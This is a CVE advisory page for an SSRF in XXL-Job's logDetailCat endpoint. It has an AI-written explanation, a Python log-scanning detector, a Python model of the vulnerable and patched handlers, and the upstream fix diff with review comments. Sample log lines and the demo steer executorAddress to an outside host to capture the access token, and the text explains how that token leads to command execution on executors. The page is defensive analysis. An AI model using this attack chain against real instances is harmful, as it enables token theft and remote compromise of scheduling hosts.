CVE-2022-43183
Description
XXL-Job before 2.3.1 has an SSRF vulnerability in the /logDetailCat endpoint that can leak the access token and allow arbitrary command execution.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
The vulnerability resides in JobLogController.java in XXL-Job's admin module. Before the fix, the logDetailCat method took executorAddress (and triggerTime) straight from the request, built an executor client for that address with XxlJobScheduler.getExecutorBiz(executorAddress), and sent it a log query without validating the address against anything [2][3]. That outbound request carries the XXL-JOB-ACCESS-TOKEN header, the shared secret that authenticates the admin to every executor.
An attacker with a low-privilege user account on the admin panel can therefore call /joblog/logDetailCat with executorAddress pointing at a host they control. The admin backend connects to that host and sends the access token in the request header, leaking it [3].
With the XXL-JOB-ACCESS-TOKEN, the attacker can talk to any executor's HTTP API as if they were the scheduler: the token is the only credential the executor checks, so they can trigger arbitrary tasks and, through XXL-Job's script glue modes, run arbitrary commands on the executor hosts. That is full compromise of the executor machines and potentially of the entire distributed scheduling infrastructure [3].
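For hunting exploitation attempts against unpatched admin instances, the following is an added example (not code from this page or from the XXL-Job project) that scans access-log lines for calls to /joblog/logDetailCat whose executorAddress host is not a known executor. It assumes the combined log format used by nginx and Apache and a GET with the parameters in the query string; the IP addresses, executor hosts and log lines are constructed for the example.

```python
# Added detection example (not XXL-Job code): flag logDetailCat calls whose
# executorAddress points outside the set of executors this admin is expected to reach.
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample lines in combined log format; the addresses are not real.
SAMPLE_LOG = """\
10.1.2.3 - - [21/May/2026:10:00:01 +0000] "GET /xxl-job-admin/joblog/logDetailCat?executorAddress=http%3A%2F%2F10.0.0.5%3A9999%2F&triggerTime=1700000000000&logId=1&fromLineNum=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.1.2.9 - - [21/May/2026:10:00:07 +0000] "GET /xxl-job-admin/joblog/logDetailCat?executorAddress=http%3A%2F%2F203.0.113.7%3A8080%2F&triggerTime=0&logId=1&fromLineNum=1 HTTP/1.1" 200 98 "-" "curl/8.0"
10.1.2.9 - - [21/May/2026:10:00:09 +0000] "POST /xxl-job-admin/joblog/logDetailCat HTTP/1.1" 200 98 "-" "curl/8.0"
10.1.2.3 - - [21/May/2026:10:00:12 +0000] "GET /xxl-job-admin/joblog/pageList HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Constructed allowlist: hosts of the executors registered with this admin.
KNOWN_EXECUTOR_HOSTS = {"10.0.0.5", "10.0.0.6"}

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def find_ssrf_attempts(log_text, known_hosts=KNOWN_EXECUTOR_HOSTS):
    """Return one record per logDetailCat request whose executorAddress host is
    not a registered executor. Requests without the parameter are ignored
    (after 2.4.0 the server ignores it too, so any occurrence is worth a look)."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        target = urlparse(m["target"])
        if not target.path.endswith("/joblog/logDetailCat"):
            continue
        # parse_qs percent-decodes, so the value is a full URL again.
        for addr in parse_qs(target.query).get("executorAddress", []):
            host = urlparse(addr).hostname
            if host not in known_hosts:
                hits.append({"src": m["src"], "ts": m["ts"],
                             "executorAddress": addr, "host": host})
    return hits


if __name__ == "__main__":
    for hit in find_ssrf_attempts(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} steered logDetailCat to {hit['executorAddress']}")
```

The check only sees parameters that reach the access log: the handler is mapped with @RequestMapping, so a POST with the parameters in the body (the third sample line) leaves no trace here and needs application-level request logging or a WAF rule on the parameter name. On a patched 2.4.0 admin the parameter is ignored, so its presence at all is a useful scanner indicator.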
The fix shipped in version 2.4.0. The patch removes the executorAddress and triggerTime parameters from logDetailCat, loads the XxlJobLog row for the given logId, rejects unknown ids, and takes the executor address and trigger time from that stored row, so the request can no longer steer the outbound call [2]. Note that the CVE description's "before 2.3.1" wording does not match the advisory data on this page, which lists every version below 2.4.0 as affected and 2.4.0 as the patched release; treat 2.4.0 as the minimum safe version. Because the fix does not invalidate a token that has already been captured, operators should also rotate the access token if the endpoint was reachable by untrusted accounts before the upgrade.
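To make the fix concrete, here is an added example, written for this page and not taken from XXL-Job, that models the pre-2.4.0 handler beside the patched lookup-by-logId form, plus an extra allowlist check that goes beyond the upstream patch. It assumes the executor client posts to <executorAddress>/log with the shared secret in an XXL-JOB-ACCESS-TOKEN header and that LogParam carries logDateTim, logId and fromLineNum; the token, addresses and database rows are constructed fixtures, and RecordingExecutorBiz stands in for the real client so the test can see where the token would have gone.

```python
# Added illustration (not XXL-Job's code): vulnerable vs. patched logDetailCat.
from dataclasses import dataclass
from urllib.parse import urlparse

ACCESS_TOKEN = "constructed-access-token"  # stands in for xxl.job.accessToken


@dataclass(frozen=True)
class JobLog:
    """Subset of an xxl_job_log row that the handler needs."""
    id: int
    job_group: int
    executor_address: str
    trigger_time: int  # epoch millis, what LogParam.logDateTim expects


# Constructed fixtures standing in for xxl_job_log and each group's registry list.
JOB_LOGS = {1: JobLog(1, 10, "http://10.0.0.5:9999/", 1700000000000)}
REGISTERED_EXECUTORS = {10: {"http://10.0.0.5:9999/", "http://10.0.0.6:9999/"}}


class RecordingExecutorBiz:
    """Stand-in for ExecutorBizClient.log(): records the outbound request
    instead of sending it, so we can inspect where the token would go."""

    def __init__(self):
        self.calls = []

    def log(self, executor_address, trigger_time, log_id, from_line_num):
        self.calls.append({
            "url": executor_address.rstrip("/") + "/log",
            "headers": {"XXL-JOB-ACCESS-TOKEN": ACCESS_TOKEN},
            "body": {"logDateTim": trigger_time, "logId": log_id,
                     "fromLineNum": from_line_num},
        })
        return {"code": 200, "content": {"fromLineNum": from_line_num}}


def log_detail_cat_vulnerable(biz, executor_address, trigger_time, log_id, from_line_num):
    """Pre-2.4.0 shape: the executor address is whatever the request says."""
    return biz.log(executor_address, trigger_time, log_id, from_line_num)


def log_detail_cat_patched(biz, log_id, from_line_num):
    """2.4.0 shape: only logId and fromLineNum are accepted; address and
    trigger time come from the stored row, and an unknown id is rejected."""
    job_log = JOB_LOGS.get(log_id)
    if job_log is None:
        return {"code": 500, "msg": "joblog_logid_unvalid"}
    return biz.log(job_log.executor_address, job_log.trigger_time, log_id, from_line_num)


def log_detail_cat_allowlisted(biz, log_id, from_line_num):
    """Extra check (an addition here, not part of the upstream patch): the
    stored address must still be an http(s) URL in the group's current
    executor list, so a stale or tampered row cannot redirect the call either."""
    job_log = JOB_LOGS.get(log_id)
    if job_log is None:
        return {"code": 500, "msg": "joblog_logid_unvalid"}
    scheme = urlparse(job_log.executor_address).scheme
    allowed = REGISTERED_EXECUTORS.get(job_log.job_group, set())
    if scheme not in ("http", "https") or job_log.executor_address not in allowed:
        return {"code": 500, "msg": "executor address not registered for job group"}
    return biz.log(job_log.executor_address, job_log.trigger_time, log_id, from_line_num)


if __name__ == "__main__":
    biz = RecordingExecutorBiz()
    log_detail_cat_vulnerable(biz, "http://203.0.113.7:8080/", 0, 1, 1)
    print("vulnerable handler sent the token to", biz.calls[-1]["url"])
    biz = RecordingExecutorBiz()
    log_detail_cat_patched(biz, 1, 1)
    print("patched handler sent it to", biz.calls[-1]["url"])
```

The patched form is what 2.4.0 ships. The allowlisted variant is worth considering because executor addresses in the log table are written at trigger time and can outlive the executor they pointed at; it rejects anything that is no longer in the group's registry instead of trusting the row unconditionally.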
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| com.xuxueli:xxl-job-core (Maven) | < 2.4.0 | 2.4.0 |
Affected products
XXL-Job/XXL-Job
Patches
14 files changed · +13 −12
doc/XXL-JOB官方文档.md+2 −1 modified@@ -2304,7 +2304,8 @@ public void execute() { ### 7.33 版本 v2.4.0 Release Notes[规划中] - 1、【优化】执行器任务Bean扫描逻辑优化:解决懒加载注解失效问题。 - 2、【优化】多个项目依赖升级至较新稳定版本,涉及netty、groovy、spring、springboot、mybatis等; -- 3、【修复】"CVE-2022-36157"授权漏洞修复。 +- 3、【修复】"CVE-2022-36157" 授权漏洞修复。 +- 4、【修复】"CVE-2022-43183" SSRF漏洞修复。 ### 7.34 新版本规划 [规划中]
xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobLogController.java+11 −7 modified@@ -1,7 +1,7 @@ package com.xxl.job.admin.controller; -import com.xxl.job.admin.core.exception.XxlJobException; import com.xxl.job.admin.core.complete.XxlJobCompleter; +import com.xxl.job.admin.core.exception.XxlJobException; import com.xxl.job.admin.core.model.XxlJobGroup; import com.xxl.job.admin.core.model.XxlJobInfo; import com.xxl.job.admin.core.model.XxlJobLog; @@ -129,22 +129,26 @@ public String logDetailPage(int id, Model model){ model.addAttribute("triggerCode", jobLog.getTriggerCode()); model.addAttribute("handleCode", jobLog.getHandleCode()); - model.addAttribute("executorAddress", jobLog.getExecutorAddress()); - model.addAttribute("triggerTime", jobLog.getTriggerTime().getTime()); model.addAttribute("logId", jobLog.getId()); return "joblog/joblog.detail"; } @RequestMapping("/logDetailCat") @ResponseBody - public ReturnT<LogResult> logDetailCat(String executorAddress, long triggerTime, long logId, int fromLineNum){ + public ReturnT<LogResult> logDetailCat(long logId, int fromLineNum){ try { - ExecutorBiz executorBiz = XxlJobScheduler.getExecutorBiz(executorAddress); - ReturnT<LogResult> logResult = executorBiz.log(new LogParam(triggerTime, logId, fromLineNum)); + // valid + XxlJobLog jobLog = xxlJobLogDao.load(logId); // todo, need to improve performance + if (jobLog == null) { + return new ReturnT<LogResult>(ReturnT.FAIL_CODE, I18nUtil.getString("joblog_logid_unvalid")); + } + + // log cat + ExecutorBiz executorBiz = XxlJobScheduler.getExecutorBiz(jobLog.getExecutorAddress()); + ReturnT<LogResult> logResult = executorBiz.log(new LogParam(jobLog.getTriggerTime().getTime(), logId, fromLineNum)); // is end if (logResult.getContent()!=null && logResult.getContent().getFromLineNum() > logResult.getContent().getToLineNum()) { - XxlJobLog jobLog = xxlJobLogDao.load(logId); if (jobLog.getHandleCode() > 0) { logResult.getContent().setEnd(true); }
xxl-job-admin/src/main/resources/static/js/joblog.detail.1.js+0 −2 modified@@ -25,8 +25,6 @@ $(function() { async: false, // sync, make log ordered url : base_url + '/joblog/logDetailCat', data : { - "executorAddress":executorAddress, - "triggerTime":triggerTime, "logId":logId, "fromLineNum":fromLineNum },
xxl-job-admin/src/main/resources/templates/joblog/joblog.detail.ftl+0 −2 modified@@ -62,8 +62,6 @@ // 参数 var triggerCode = '${triggerCode}'; var handleCode = '${handleCode}'; - var executorAddress = '${executorAddress!}'; - var triggerTime = '${triggerTime?c}'; var logId = '${logId}'; </script> <script src="${request.contextPath}/static/js/joblog.detail.1.js"></script>
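Review bot: in the release-notes hunk (doc/XXL-JOB官方文档.md), the edit to the CVE-2022-36157 line changes only a space and is unrelated churn inside a security fix; drop it, and make the new item 4 name the affected endpoint (/joblog/logDetailCat) and the removed executorAddress parameter so operators reading the notes can tell what changed. The v2.4.0 section is still headed "[规划中]" (planned), which reads as if the fix had not been released.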
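Review bot: in the JobLogController.java hunk, the only validation added to logDetailCat is `if (jobLog == null)`; nothing ties the loaded log to what the caller is allowed to see, so any user who can reach the endpoint can still read any executor's log output by iterating logId. If non-admin users are scoped to job groups elsewhere in the admin, apply that check here before calling executorBiz.log. Two smaller points: `jobLog.getTriggerTime().getTime()` throws a NullPointerException for a row with no trigger time (the removed logDetailPage line had the same problem, but it now sits on the polling path), and the `// todo, need to improve performance` comment should be resolved or reference a tracking issue, since the load now runs on every fromLineNum page the browser requests. The reordering of the XxlJobException import is cosmetic noise that belongs in a separate commit.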
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
News mentions: 5
No linked articles in our index yet.